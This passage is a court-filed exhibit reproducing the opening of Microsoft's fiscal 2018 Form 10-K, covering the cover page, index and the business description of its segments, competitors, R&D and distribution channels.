| Technology | 56.6% | 30.8% | 54.7% | 18.7% | 14.5% | 21.5% | 26.8% |
| Transportation | 63.6% | 21.7% | 44.7% | 17.3% | 12.6% | 13.2% | 28.7% |
| Utilities | 58.9% | 20.0% | 34.1% | 14.0% | 6.6% | 9.4% | 19.2% |

Case 0:20-cv-60416-XXXX Document 1-35 Entered on FLSD Docket 02/26/2020 Page 457 of 726

# EXHIBIT 33

# UNITED STATES
# SECURITIES AND EXCHANGE COMMISSION
**Washington, D.C. 20549**

## FORM 10-K

☒ **ANNUAL REPORT PURSUANT TO SECTION 13 OR 15(d) OF THE SECURITIES EXCHANGE ACT OF 1934**

**For the Fiscal Year Ended June 30, 2018**

**OR**

☐ **TRANSITION REPORT PURSUANT TO SECTION 13 OR 15(d) OF THE SECURITIES EXCHANGE ACT OF 1934**

**For the Transition Period From              to**

**Commission File Number 001-37845**

# MICROSOFT CORPORATION

| **WASHINGTON** | **91-1144442** |
|---|---|
| **(STATE OF INCORPORATION)** | **(I.R.S. ID)** |

**ONE MICROSOFT WAY, REDMOND, WASHINGTON 98052-6399**

**(425) 882-8080**

**www.microsoft.com/investor**

Securities registered pursuant to Section 12(b) of the Act:

| **COMMON STOCK, $0.00000625 par value per share** | **NASDAQ** |
|---|---|

Securities registered pursuant to Section 12(g) of the Act:

**NONE**

Indicate by check mark if the registrant is a well-known seasoned issuer, as defined in Rule 405 of the Securities Act.    Yes ☒    No ☐

Indicate by check mark if the registrant is not required to file reports pursuant to Section 13 or Section 15(d) of the Exchange Act.    Yes ☐    No ☒

Indicate by check mark whether the registrant (1) has filed all reports required to be filed by Section 13 or 15(d) of the Securities Exchange Act of 1934 during the preceding 12 months (or for such shorter period that the registrant was required to file such reports), and (2) has been subject to such filing requirements for the past 90 days.    Yes ☒    No ☐

Indicate by check mark whether the registrant has submitted electronically and posted on its corporate website, if any, every Interactive Data File required to be submitted and posted pursuant to Rule 405 of Regulation S-T (§232.405 of this chapter) during the preceding 12 months (or for such shorter period that the registrant was required to submit and post such files).    Yes ☒    No ☐

Indicate by check mark if disclosure of delinquent filers pursuant to Item 405 of Regulation S-K (§229.405 of this chapter) is not contained herein, and will not be contained, to the best of registrant's knowledge, in definitive proxy or information statements incorporated by reference in Part III of this Form 10-K or any amendment to this Form 10-K.    ☐

Indicate by check mark whether the registrant is a large accelerated filer, an accelerated filer, a non-accelerated filer, a smaller reporting company, or an emerging growth company. See the definitions of "large accelerated filer," "accelerated filer," "smaller reporting company," and "emerging growth company" in Rule 12b-2 of the Exchange Act.

| Large accelerated filer ☒ | Accelerated filer ☐ |
|---|---|
| Non-accelerated filer ☐ (Do not check if a smaller reporting company) | Smaller reporting company ☐ |
| Emerging growth company ☐ | |

If an emerging growth company, indicate by check mark if the registrant has elected not to use the extended transition period for complying with any new or revised financial accounting standards provided pursuant to Section 13(a) of the Exchange Act.    ☐

Indicate by check mark whether the registrant is a shell company (as defined in Rule 12b-2 of the Exchange Act).    Yes ☐    No ☒

As of December 31, 2017, the aggregate market value of the registrant's common stock held by non-affiliates of the registrant was $650.1 billion based on the closing sale price as reported on the NASDAQ National Market System. As of July 31, 2018, there were 7,668,217,316 shares of common stock outstanding.

**DOCUMENTS INCORPORATED BY REFERENCE**

Portions of the definitive Proxy Statement to be delivered to shareholders in connection with the Annual Meeting of Shareholders to be held on November 28, 2018 are incorporated by reference into Part III.

**MICROSOFT CORPORATION**

**FORM 10-K**

**For the Fiscal Year Ended June 30, 2018**

**INDEX**

Page

**PART I**

| | | | |
|---|---|---|---|
| Item 1. | Business | | 3 |
| | Executive Officers of the Registrant | | 14 |
| Item 1A. | Risk Factors | | 16 |
| Item 1B. | Unresolved Staff Comments | | 27 |
| Item 2. | Properties | | 27 |
| Item 3. | Legal Proceedings | | 27 |
| Item 4. | Mine Safety Disclosures | | 27 |

**PART II**

| | | |
|---|---|---|
| Item 5. | Market for Registrant's Common Equity, Related Stockholder Matters, and Issuer Purchases of Equity Securities | 28 |
| Item 6. | Selected Financial Data | 29 |
| Item 7. | Management's Discussion and Analysis of Financial Condition and Results of Operations | 30 |
| Item 7A. | Quantitative and Qualitative Disclosures about Market Risk | 49 |
| Item 8. | Financial Statements and Supplementary Data | 50 |
| Item 9. | Changes in and Disagreements with Accountants on Accounting and Financial Disclosure | 97 |
| Item 9A. | Controls and Procedures | 97 |
| | Report of Management on Internal Control over Financial Reporting | 97 |
| | Report of Independent Registered Public Accounting Firm | 98 |
| Item 9B. | Other Information | 99 |

**PART III**

| | | |
|---|---|---|
| Item 10. | Directors, Executive Officers and Corporate Governance | 99 |
| Item 11. | Executive Compensation | 99 |
| Item 12. | Security Ownership of Certain Beneficial Owners and Management and Related Stockholder Matters | 99 |
| Item 13. | Certain Relationships and Related Transactions, and Director Independence | 99 |
| Item 14. | Principal Accounting Fees and Services | 99 |

**PART IV**

| | | |
|---|---|---|
| Item 15. | Exhibits, Financial Statement Schedules | 100 |
| Item 16. | Form 10-K Summary | 105 |
| | Signatures | 106 |

### Note About Forward-Looking Statements

This report includes estimates, projections, statements relating to our business plans, objectives, and expected operating results that are "forward-looking statements" within the meaning of the Private Securities Litigation Reform Act of 1995, Section 27A of the Securities Act of 1933, and Section 21E of the Securities Exchange Act of 1934. Forward-looking statements may appear throughout this report, including the following sections: "Business" (Part I, Item 1 of this Form 10-K), "Risk Factors" (Part I, Item 1A of this Form 10-K), and "Management's Discussion and Analysis of Financial Condition and Results of Operations" (Part II, Item 7 of this Form 10-K). These forward-looking statements generally are identified by the words "believe," "project," "expect," "anticipate," "estimate," "intend," "strategy," "future," "opportunity," "plan," "may," "should," "will," "would," "will be," "will continue," "will likely result," and similar expressions. Forward-looking statements are based on current expectations and assumptions that are subject to risks and uncertainties that may cause actual results to differ materially. We describe risks and uncertainties that could cause actual results and events to differ materially in "Risk Factors," "Management's Discussion and Analysis of Financial Condition and Results of Operations," and "Quantitative and Qualitative Disclosures about Market Risk" (Part II, Item 7A of this Form 10-K). Readers are cautioned not to place undue reliance on forward-looking statements, which speak only as of the date they are made. We undertake no obligation to update or revise publicly any forward-looking statements, whether because of new information, future events, or otherwise.

### PART I

# ITEM 1. BUSINESS

### GENERAL

#### Embracing Our Future

Microsoft is a technology company whose mission is to empower every person and every organization on the planet to achieve more. We strive to create local opportunity, growth, and impact in every country around the world. Our platforms and tools help drive small business productivity, large business competitiveness, and public-sector efficiency. They also support new startups, improve educational and health outcomes, and empower human ingenuity.

We continue to transform our business to lead in the new era of the intelligent cloud and intelligent edge. We bring technology and products together into experiences and solutions that unlock value for our customers. In this next phase of innovation, computing is more powerful and ubiquitous from the cloud to the edge. Artificial intelligence ("AI") capabilities are rapidly advancing, fueled by data and knowledge of the world. Physical and virtual worlds are coming together to create richer experiences that understand the context surrounding people, the things they use, the places they go, and their activities and relationships. A person's experience with technology spans a multitude of devices and has become increasingly more natural and multi-sensory with voice, ink, and gaze interactions.

#### What We Offer

Founded in 1975, we develop and support software, services, devices, and solutions that deliver new value for customers and help people and businesses realize their full potential.

Our products include operating systems; cross-device productivity applications; server applications; business solution applications; desktop and server management tools; software development tools; and video games. We also design, manufacture, and sell devices, including PCs, tablets, gaming and entertainment consoles, other intelligent devices, and related accessories.

We offer an array of services, including cloud-based solutions that provide customers with software, services, platforms, and content, and we provide solution support and consulting services. We also deliver relevant online advertising to a global audience.

#### The Ambitions That Drive Us

To achieve our vision, our research and development efforts focus on three interconnected ambitions:

- Reinvent productivity and business processes.
- Build the intelligent cloud platform.
- Create more personal computing.

*Reinvent Productivity and Business Processes*

We are in a unique position to empower people and organizations to succeed in a rapidly evolving workplace. Computing experiences are evolving, no longer bound to one device at a time. Instead, experiences are expanding to many devices as people move from home to work to on the go. These modern needs, habits, and expectations of our customers are motivating us to bring Microsoft Office 365, Windows platform, devices, including Microsoft Surface, and third-party applications into a more cohesive Microsoft 365 experience.

Our growth depends on securely delivering continuous innovation and advancing our leading productivity and collaboration tools and services, including Office, Microsoft Dynamics, and LinkedIn. Microsoft 365 brings together Office 365, Windows 10, and Enterprise Mobility + Security to help organizations empower their employees with AI-backed tools that unlock creativity, increase teamwork, and fuel innovation, all the while enabling compliance coverage and data protection. Microsoft Teams is core to our vision for the modern workplace as the digital hub that creates a single canvas for teamwork, conversations, meetings, and content. Microsoft Relationship Sales solution brings together LinkedIn Sales Navigator and Dynamics to transform business to business sales through social selling. Dynamics 365 for Talent with LinkedIn Recruiter and Learning gives human resource professionals a complete solution to compete for talent.

These scenarios represent a move to unlock creativity and inspire teamwork, while simplifying security and management. Organizations of all sizes can now digitize business-critical functions, redefining what customers can expect from their business applications. This creates an opportunity for us to reach new customers and increase usage and engagement with existing customers.

*Build the Intelligent Cloud Platform*

Companies are looking to use digital technology to fundamentally reimagine how they empower their employees, engage customers, optimize their operations, and change the very core of their products and services. Partnering with organizations on their digital transformation is one of our largest opportunities and we are uniquely positioned to become the strategic digital transformation platform and partner of choice.

Our strategy requires continued investment in datacenters and other infrastructure to support our services. Microsoft Azure is a trusted cloud with comprehensive compliance coverage and AI-based security built in.

Our cloud business benefits from three economies of scale: datacenters that deploy computational resources at significantly lower cost per unit than smaller ones; datacenters that coordinate and aggregate diverse customer, geographic, and application demand patterns, improving the utilization of computing, storage, and network resources; and multi-tenancy locations that lower application maintenance labor costs.

As one of the two largest providers of cloud computing at scale, we believe we work from a position of strength. Being a global, hyper-scale cloud, Azure uniquely offers hybrid consistency, developer productivity, AI capabilities, and trusted security and compliance. Moreover, with Azure Stack, organizations can extend Azure into their own datacenters to create a consistent stack across the public cloud and the intelligent edge. Our hybrid infrastructure consistency spans identity, data, compute, management, and security, helping to support the real-world needs and evolving regulatory requirements of commercial customers and enterprises.

The ability to convert data into AI drives our competitive advantage. Azure SQL Database makes it possible for customers to take Microsoft SQL Server from their on-premises datacenter to a fully managed instance in the cloud to utilize built-in AI. We are accelerating adoption of AI innovations from research to products. Our innovation helps every developer be an AI developer, with approachable new tools from Azure Machine Learning Studio for creating simple machine learning models, to the powerful Azure Machine Learning Workbench for the most advanced AI modeling and data science.

On June 4, 2018, Microsoft announced plans to acquire GitHub, Inc., a service that millions of developers around the world rely on to write code together. The acquisition is expected to close by the end of the calendar year.

*Create More Personal Computing*

We strive to make computing more personal by putting users at the core of the experience, enabling them to interact with technology in more intuitive, engaging, and dynamic ways. Windows 10 is the cornerstone of our ambition, providing a foundation for the secure, modern workplace, and designed to foster innovation through rich and consistent

experiences across the range of existing devices and entirely new device categories. Windows 10 empowers people with AI-first interfaces ranging from voice-activated commands through Cortana, inking, immersive 3D content storytelling, and mixed reality experiences. Cloud sharing and co-authoring experiences are now natively enabled with OneDrive files on demand. Windows 10 is more accessible for everyone with new features like Eye Control, which gives people the ability to operate a PC using just their eyes.

Our ambition for Windows 10 is to broaden our economic opportunity through three key levers: an original equipment manufacturer ("OEM") ecosystem that creates exciting new hardware designs for Windows 10; our commitment to our first-party premium device portfolio; and monetization opportunities such as gaming, services, subscriptions, and search advertising.

We are working to create a broad developer opportunity by unifying the Windows installed base on Windows 10 and enabling universal Windows applications to run across devices so developers and OEMs can contribute to a thriving Windows ecosystem. Additionally, we are committed to designing and marketing first-party devices, such as the Surface Laptop, Surface Book 2, and Surface Pro to help drive innovation, create new device categories, and stimulate demand in the Windows ecosystem.

We are mobilizing to pursue our expansive opportunity in the gaming industry, broadening our approach to how we think about gaming end-to-end, from the way games are created and distributed to how they are played and viewed. We have a strong position with our Xbox One console, our large and growing highly engaged community of gamers on Xbox Live, and with Windows 10, the most popular operating system for PC gamers. And we will continue to connect our gaming assets across PC, console, and mobile, and work to grow and engage the Xbox Live member network more deeply and frequently with new services like Mixer and Xbox Game Pass. Our approach is to enable gamers to play the games they want, with the people they want, on the devices they want.

*Our Future Opportunity*

Customers are looking to us to accelerate their own digital transformations and to unlock new opportunity in this era of intelligent cloud and intelligent edge. We continue to develop complete, intelligent solutions for our customers that empower users to be creative and work together while safeguarding businesses and simplifying IT management. Our goal is to lead the industry in several distinct areas of technology over the long-term, which we expect will translate to sustained growth. We are investing significant resources in:

- Transforming the workplace to deliver new modern, modular business applications to improve how people communicate, collaborate, learn, work, play, and interact with one another.

- Building and running cloud-based services in ways that unleash new experiences and opportunities for businesses and individuals.

- Applying AI to drive insights and act on our customer's behalf by understanding and interpreting their needs using natural methods of communication.

- Using Windows to develop new categories of devices – both our own and third-party – as a person's experience with technology becomes more natural, personal, and predictive with multi-sensory breakthroughs in voice, ink, gaze interactions, and augmented reality holograms.

- Inventing new gaming experiences that bring people together around their shared love for games on any devices and pushing the boundaries of innovation with console and PC gaming by creating the next wave of entertainment.

Our future growth depends on our ability to transcend current product category definitions, business models, and sales motions. We have the opportunity to redefine what customers and partners can expect and are working to deliver new solutions that reflect the best of Microsoft.

<u>OPERATING SEGMENTS</u>

We operate our business and report our financial performance using three segments: Productivity and Business Processes, Intelligent Cloud, and More Personal Computing. Our segments provide management with a comprehensive financial view of our key businesses. The segments enable the alignment of strategies and objectives across the development, sales, marketing, and services organizations, and they provide a framework for timely and rational allocation of resources within businesses.

Additional information on our operating segments and geographic and product information is contained in Note 21 – Segment Information and Geographic Data of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K).

Our reportable segments are described below.

**Productivity and Business Processes**

Our Productivity and Business Processes segment consists of products and services in our portfolio of productivity, communication, and information services, spanning a variety of devices and platforms. This segment primarily comprises:

- Office Commercial, including Office 365 subscriptions and Office licensed on-premises, comprising Office, Exchange, SharePoint, Skype for Business, and Microsoft Teams, and related Client Access Licenses ("CALs").
- Office Consumer, including Office 365 subscriptions and Office licensed on-premises, and Office Consumer Services, including Skype, Outlook.com, and OneDrive.
- LinkedIn, including Talent Solutions, Marketing Solutions, and Premium Subscriptions.
- Dynamics business solutions, including Dynamics ERP on-premises, Dynamics CRM on-premises, and Dynamics 365, a set of cloud-based applications across ERP and CRM.

*Office Commercial*

Office Commercial is designed to increase personal, team, and organizational productivity through a range of products and services. Growth depends on our ability to reach new users in new markets such as first-line workers, small and medium businesses, and growth markets, as well as add value to our core product and service offerings to span productivity categories such as communication, collaboration, analytics, and security. Office Commercial revenue is mainly affected by a combination of continued installed base growth and average revenue per user expansion, as well as the continued shift from Office licensed on-premises to Office 365. CALs provide certain Office Commercial products and services with access rights to our server products and CAL revenue is reported with the associated Office products and services.

*Office Consumer*

Office Consumer is designed to increase personal productivity through a range of products and services. Growth depends on our ability to reach new users, add value to our core product set, and continue to expand our product and service offerings into new markets. Office Consumer revenue is mainly affected by the percentage of customers that buy Office with their new devices and the continued shift from Office licensed on-premises to Office 365. Office Consumer Services revenue is mainly affected by the demand for communication and storage through Skype, Outlook.com, and OneDrive, which is largely driven by subscriptions, advertising, and the sale of minutes.

*LinkedIn*

LinkedIn connects the world's professionals to make them more productive and successful, and is the world's largest professional network on the Internet. LinkedIn offers services that can be used by customers to transform the way they hire, market, sell, and learn. In addition to LinkedIn's free services, LinkedIn offers three categories of monetized solutions: Talent Solutions, Marketing Solutions, and Premium Subscriptions, which includes Sales Solutions. Talent Solutions is comprised of two elements: Hiring, and Learning and Development. Hiring provides services to recruiters that enable them to attract, recruit, and hire talent. Learning and Development provides subscriptions to enterprises and individuals to access online learning content. Marketing Solutions enables companies to advertise to LinkedIn's member base. Premium Subscriptions enables professionals to manage their professional identity, grow their network, and connect with talent through additional services like premium search. Premium Subscriptions also includes Sales Solutions, which helps sales professionals find, qualify, and create sales opportunities and accelerate social selling capabilities. Growth will depend on our ability to increase the number of LinkedIn members and our ability to continue offering services that provide value for our members and increase their engagement. LinkedIn revenue is mainly affected by demand from enterprises and professional organizations for subscriptions to Talent Solutions and Premium Subscriptions offerings, as well as member engagement and the quality of the sponsored content delivered to those members to drive Marketing Solutions.

### Dynamics

Dynamics provides on-premises and cloud-based business solutions for financial management, enterprise resource planning ("ERP"), customer relationship management ("CRM"), supply chain management, and analytics applications for small and medium businesses, large organizations, and divisions of global enterprises. Dynamics revenue is largely driven by the number of users licensed and the continued shift to Dynamics 365, a unified set of cloud-based intelligent business applications.

### Competition

Competitors to Office include software and global application vendors, such as Apple, Cisco Systems, Facebook, Google, IBM, and Slack, and numerous web-based and mobile application competitors as well as local application developers. Apple distributes versions of its pre-installed application software, such as email and calendar products, through its PCs, tablets, and phones. Cisco Systems is using its position in enterprise communications equipment to grow its unified communications business. Google provides a hosted messaging and productivity suite. Skype for Business and Skype also compete with a variety of instant messaging, voice, and video communication providers, ranging from start-ups to established enterprises. Web-based offerings competing with individual applications have also positioned themselves as alternatives to our products and services. We compete by providing powerful, flexible, secure, and easy-to-use productivity and collaboration tools and services that create comprehensive solutions and work well with technologies our customers already have both on-premises or in the cloud.

LinkedIn faces competition from online recruiting companies, talent management companies, and larger companies that are focusing on talent management and human resource services; job boards; traditional recruiting firms; and companies that provide learning and development products and services. Marketing Solutions competes with online and offline outlets that generate revenue from advertisers and marketers.

Dynamics competes with vendors such as Infor, Oracle, NetSuite. Salesforce.com, SAP, and The Sage Group to provide on-premise and cloud-based business solutions for small, medium, and large organizations.

### Intelligent Cloud

Our Intelligent Cloud segment consists of our public, private, and hybrid server products and cloud services that can power modern business. This segment primarily comprises:

- Server products and cloud services, including SQL Server, Windows Server, Visual Studio, System Center, and related CALs, and Azure.
- Enterprise Services, including Premier Support Services and Microsoft Consulting Services.

### Server Products and Cloud Services

Our server products are designed to make IT professionals, developers, and their systems more productive and efficient. Server software is integrated server infrastructure and middleware designed to support software applications built on the Windows Server operating system. This includes the server platform, database, business intelligence, storage, management and operations, virtualization, service-oriented architecture platform, security, and identity software. We also license standalone and software development lifecycle tools for software architects, developers, testers, and project managers. Server products revenue is mainly affected by purchases through volume licensing programs, licenses sold to OEMs, and retail packaged products. CALs provide access rights to certain server products, including SQL Server and Windows Server, and revenue is reported along with the associated server product.

Azure is a comprehensive set of cloud services that offer developers, IT professionals, and enterprises freedom to build, deploy, and manage applications on any platform or device. Customers can use Azure through our global network of datacenters for basic computing, networking, storage, mobile and web app services, AI, Internet of Things ("IoT"), cognitive services, and machine learning. Azure enables customers to devote more resources to development and use of applications that benefit their organizations, rather than managing on-premises hardware and software. Azure revenue is mainly affected by infrastructure-as-a-service and platform-as-a-service consumption-based services, and per user-based services such as Enterprise Mobility + Security.

*Enterprise Services*

Enterprise Services, including Premier Support Services and Microsoft Consulting Services, assist customers in developing, deploying, and managing Microsoft server and desktop solutions and provide training and certification to developers and IT professionals on various Microsoft products.

*Competition*

Our server products face competition from a wide variety of server operating systems and applications offered by companies with a range of market approaches. Vertically integrated computer manufacturers such as Hewlett-Packard, IBM, and Oracle offer their own versions of the Unix operating system preinstalled on server hardware. Nearly all computer manufacturers offer server hardware for the Linux operating system and many contribute to Linux operating system development. The competitive position of Linux has also benefited from the large number of compatible applications now produced by many commercial and non-commercial software developers. A number of companies, such as Red Hat, supply versions of Linux.

We compete to provide enterprise-wide computing solutions and point solutions with numerous commercial software vendors that offer solutions and middleware technology platforms, software applications for connectivity (both Internet and intranet), security, hosting, database, and e-business servers. IBM and Oracle lead a group of companies focused on the Java Platform Enterprise Edition that competes with our enterprise-wide computing solutions. Commercial competitors for our server applications for PC-based distributed client-server environments include CA Technologies, IBM, and Oracle. Our web application platform software competes with open source software such as Apache, Linux, MySQL, and PHP. In middleware, we compete against Java vendors.

Our database, business intelligence, and data warehousing solutions offerings compete with products from IBM, Oracle, SAP, and other companies. Our system management solutions compete with server management and server virtualization platform providers, such as BMC, CA Technologies, Hewlett-Packard, IBM, and VMware. Our products for software developers compete against offerings from Adobe, IBM, Oracle, and other companies, and also against open-source projects, including Eclipse (sponsored by CA Technologies, IBM, Oracle, and SAP), PHP, and Ruby on Rails.

We believe our server products provide customers with advantages in performance, total costs of ownership, and productivity by delivering superior applications, development tools, compatibility with a broad base of hardware and software applications, security, and manageability.

Azure faces diverse competition from companies such as Amazon, Google, IBM, Oracle, Salesforce.com, VMware, and open source offerings. Azure's competitive advantage includes enabling a hybrid cloud, allowing deployment of existing datacenters with our public cloud into a single, cohesive infrastructure, and the ability to run at a scale that meets the needs of businesses of all sizes and complexities.

Our Enterprise Services business competes with a wide range of companies that provide strategy and business planning, application development, and infrastructure services, including multinational consulting firms and small niche businesses focused on specific technologies.

**More Personal Computing**

Our More Personal Computing segment consists of products and services geared towards harmonizing the interests of end users, developers, and IT professionals across all devices. This segment primarily comprises:

- Windows, including Windows OEM licensing ("Windows OEM") and other non-volume licensing of the Windows operating system; Windows Commercial, comprising volume licensing of the Windows operating system, Windows cloud services, and other Windows commercial offerings; patent licensing; Windows IoT; and MSN advertising.

- Devices, including Surface, PC accessories, and other intelligent devices.

- Gaming, including Xbox hardware and Xbox software and services, comprising Xbox Live transactions, subscriptions, and advertising ("Xbox Live"), video games, and third-party video game royalties.

- Search.

### Windows

The Windows operating system is designed to deliver a more personal computing experience for users by enabling consistency of experience, applications, and information across their devices. Windows OEM revenue is impacted significantly by the number of Windows operating system licenses purchased by OEMs, which they pre-install on the devices they sell. In addition to computing device market volume, Windows OEM revenue is impacted by:

- The mix of computing devices based on form factor and screen size.
- Differences in device market demand between developed markets and growth markets.
- Attachment of Windows to devices shipped.
- Customer mix between consumer, small and medium businesses, and large enterprises.
- Changes in inventory levels in the OEM channel.
- Pricing changes and promotions, pricing variation that occurs when the mix of devices manufactured shifts from local and regional system builders to large multinational OEMs, and different pricing of Windows versions licensed.
- Piracy.

Windows Commercial revenue, which includes volume licensing of the Windows operating system and Windows cloud services such as Windows Defender Advanced Threat Protection, is affected mainly by the demand from commercial customers for volume licensing and Software Assurance ("SA"), as well as advanced security offerings. Windows Commercial revenue often reflects the number of information workers in a licensed enterprise and is relatively independent of the number of PCs sold in a given year.

Patent licensing includes our programs to license patents we own for use across a broad array of technology areas, including mobile devices and cloud offerings.

Windows IoT extends the power of Windows and the cloud to intelligent systems by delivering specialized operating systems, tools, and services for use in embedded devices.

MSN advertising includes both native and display ads.

### Devices

We design, manufacture, and sell devices, including Surface, PC accessories, and other intelligent devices, such as Surface Hub and HoloLens. Our devices are designed to enable people and organizations to connect to the people and content that matter most using Windows and integrated Microsoft products and services. Surface is designed to help organizations, students, and consumers be more productive.

In May 2016, we announced plans to streamline our smartphone hardware business. In November 2016, we completed the sale of our feature Phone business.

### Gaming

Our gaming platform is designed to provide a unique variety of entertainment using our devices, peripherals, applications, online services, and content. We released Xbox One S and Xbox One X in August 2016 and November 2017, respectively. With the launch of the Mixer service in May 2017, offering interactive live game streaming, and Xbox Game Pass in June 2017, providing unlimited access to over 100 Xbox titles, we continue to open new opportunities for customers to engage both on- and off-console.

Xbox Live enables people to connect and share online gaming experiences and is accessible on Xbox consoles, Windows-enabled devices, and other devices. Xbox Live is designed to benefit users by providing access to a network of certified applications and services and to benefit our developer and partner ecosystems by providing access to a large customer base. Xbox Live revenue is mainly affected by subscriptions and sales of Xbox Live enabled content, as well as advertising. We also continue to design and sell gaming content to showcase our unique platform capabilities for Xbox consoles, Windows-enabled devices, and other devices. Growth of our Gaming business is determined by the overall active user base through Xbox Live enabled content, availability of games, providing exclusive game content that gamers seek, the computational power and reliability of the devices used to access our content and services, and the ability to create new experiences via online services, downloadable content, and peripherals.

*Search*

Our Search business, including Bing and Bing Ads, is designed to deliver relevant online advertising to a global audience. We have several partnerships with other companies, including Oath (formerly Yahoo! and AOL) which is owned by Verizon, through which we provide and monetize search queries. Growth depends on our ability to attract new users, understand intent, and match intent with relevant content and advertiser offerings.

*Competition*

Windows faces competition from various software products and from alternative platforms and devices, mainly from Apple and Google. We believe Windows competes effectively by giving customers choice, value, flexibility, security, an easy-to-use interface, and compatibility with a broad range of hardware and software applications, including those that enable productivity.

Devices face competition from various computer, tablet, and hardware manufacturers who offer a unique combination of high-quality industrial design and innovative technologies across various price points. These manufacturers, many of which are also current or potential partners and customers, include Apple and our Windows OEMs.

Our gaming platform competes with console platforms from Nintendo and Sony, both of which have a large, established base of customers. The lifecycle for gaming and entertainment consoles averages five to ten years. Nintendo released its latest generation console in March 2017 and Sony released its latest generation console in November 2013. We also compete with other providers of entertainment services through online marketplaces. We believe our gaming platform is effectively positioned against competitive products and services based on significant innovation in hardware architecture, user interface, developer tools, online gaming and entertainment services, and continued strong exclusive content from our own game franchises as well as other digital content offerings. Our video games competitors include Electronic Arts and Activision Blizzard. Xbox Live faces competition from various online marketplaces, including those operated by Amazon, Apple, and Google.

Our search business competes with Google and a wide array of websites, social platforms like Facebook, and portals that provide content and online offerings to end users.

## OPERATIONS

We have operations centers that support operations in their regions, including customer contract and order processing, credit and collections, information processing, and vendor management and logistics. The regional center in Ireland supports the European, Middle Eastern, and African region; the center in Singapore supports the Japan, India, Greater China, and Asia-Pacific region; and the centers in Fargo, North Dakota, Fort Lauderdale, Florida, Puerto Rico, Redmond, Washington, and Reno, Nevada support Latin America and North America. In addition to the operations centers, we also operate datacenters throughout the Americas, Australia, Europe, and Asia.

To serve the needs of customers around the world and to improve the quality and usability of products in international markets, we localize many of our products to reflect local languages and conventions. Localizing a product may require modifying the user interface, altering dialog boxes, and translating text.

Our devices are primarily manufactured by third-party contract manufacturers. We generally have the ability to use other manufacturers if a current vendor becomes unavailable or unable to meet our requirements.

## RESEARCH AND DEVELOPMENT

During fiscal years 2018, 2017, and 2016, research and development expense was $14.7 billion, $13.0 billion, and $12.0 billion, respectively. These amounts represented 13% of revenue in fiscal years 2018, 2017, and 2016. We plan to continue to make significant investments in a broad range of research and development efforts.

**Product and Service Development, and Intellectual Property**

We develop most of our products and services internally through the following engineering groups.

- *Cloud and AI Platform*, focuses on making IT professionals, developers, and their systems more productive and efficient through development of cloud infrastructure, server, database, CRM, ERP, management and development tools, AI cognitive services, and other business process applications and services for enterprises.

- *Experiences and Devices*, focuses on instilling a unifying product ethos across our end-user experiences and devices, including Office, Windows, Enterprise Mobility and Management, and devices.

- *AI and Research*, focuses on our AI innovations and other forward-looking research and development efforts spanning infrastructure, services, applications, and search.

- *LinkedIn*, focuses on our services that transform the way customers hire, market, sell, and learn.

- *Gaming,* focuses on connecting gaming assets across the range of devices to grow and engage the Xbox Live member network through game experiences, streaming content, and social interaction.

Internal development allows us to maintain competitive advantages that come from product differentiation and closer technical control over our products and services. It also gives us the freedom to decide which modifications and enhancements are most important and when they should be implemented. We strive to obtain information as early as possible about changing usage patterns and hardware advances that may affect software and hardware design. Before releasing new software platforms, and as we make significant modifications to existing platforms, we provide application vendors with a range of resources and guidelines for development, training, and testing. Generally, we also create product documentation internally.

We protect our intellectual property investments in a variety of ways. We work actively in the U.S. and internationally to ensure the enforcement of copyright, trademark, trade secret, and other protections that apply to our software and hardware products, services, business plans, and branding. We are a leader among technology companies in pursuing patents and currently have a portfolio of over 53,000 U.S. and international patents issued and over 29,000 pending. While we employ much of our internally developed intellectual property exclusively in our products and services, we also engage in outbound licensing of specific patented technologies that are incorporated into licensees' products. From time to time, we enter into broader cross-license agreements with other technology companies covering entire groups of patents. We also purchase or license technology that we incorporate into our products and services. At times, we make select intellectual property broadly available at no or low cost to achieve a strategic objective, such as promoting industry standards, advancing interoperability, or attracting and enabling our external development community. Our increasing engagement with open source software will also cause us to license our intellectual property rights broadly in certain situations.

While it may be necessary in the future to seek or renew licenses relating to various aspects of our products, services, and business methods, we believe, based upon past experience and industry practice, such licenses generally can be obtained on commercially reasonable terms. We believe our continuing research and product development are not materially dependent on any single license or other agreement with a third party relating to the development of our products.

## Investing in the Future

Our success is based on our ability to create new and compelling products, services, and experiences for our users, to initiate and embrace disruptive technology trends, to enter new geographic and product markets, and to drive broad adoption of our products and services. We invest in a range of emerging technology trends and breakthroughs that we believe offer significant opportunities to deliver value to our customers and growth for the company. Based on our assessment of key technology trends, we maintain our long-term commitment to research and development across a wide spectrum of technologies, tools, and platforms spanning digital work and life experiences, cloud computing, AI, devices, and operating systems.

While our main research and development facilities are located in Redmond, Washington, we also operate research and development facilities in other parts of the U.S. and around the world, including Canada, China, India, Ireland, Israel, and the United Kingdom. This global approach helps us remain competitive in local markets and enables us to continue to attract top talent from across the world. We generally fund research at the corporate level to ensure that we are looking beyond immediate product considerations to opportunities further in the future. We also fund research and development activities at the operating segment level. Much of our segment level research and development is coordinated with other segments and leveraged across the company.

In addition to our main research and development operations, we also operate Microsoft Research. Microsoft Research is one of the world's largest corporate research organizations and works in close collaboration with top universities around the world to advance the state-of-the-art in computer science and a broad range of other disciplines, providing us a unique perspective on future trends and contributing to our innovation.

## DISTRIBUTION, SALES, AND MARKETING

We market and distribute our products and services through the following channels: OEMs, direct, and distributors and resellers. Our sales force performs a variety of functions, including working directly with enterprises and public-sector organizations worldwide to identify and meet their technology requirements; managing OEM relationships; and supporting system integrators, independent software vendors, and other partners who engage directly with our customers to perform sales, consulting, and fulfillment functions for our products and services.

### OEMs

We distribute our products and services through OEMs that pre-install our software on new devices and servers they sell. The largest component of the OEM business is the Windows operating system pre-installed on devices. OEMs also sell devices pre-installed with other Microsoft products and services, including applications such as Office and the capability to subscribe to Office 365.

There are two broad categories of OEMs. The largest category of OEMs are direct OEMs as our relationship with them is managed through a direct agreement between Microsoft and the OEM. We have distribution agreements covering one or more of our products with virtually all the multinational OEMs, including Acer, ASUS, Dell, Fujitsu, Hewlett-Packard, Lenovo, Samsung, Toshiba, and with many regional and local OEMs. The second broad category of OEMs are system builders consisting of lower-volume PC manufacturers, which source Microsoft software for pre-installation and local redistribution primarily through the Microsoft distributor channel rather than through a direct agreement or relationship with Microsoft.

### Direct

Many organizations that license our products and services transact directly with us through Enterprise Agreements and Enterprise Services contracts, with sales support from system integrators, independent software vendors, web agencies, and partners that advise organizations on licensing our products and services ("Enterprise Agreement Software Advisors", or "ESA"). Microsoft offers direct sales programs targeted to reach small, medium, and corporate customers, in addition to those offered through the reseller channel. A large network of partner advisors support many of these sales.

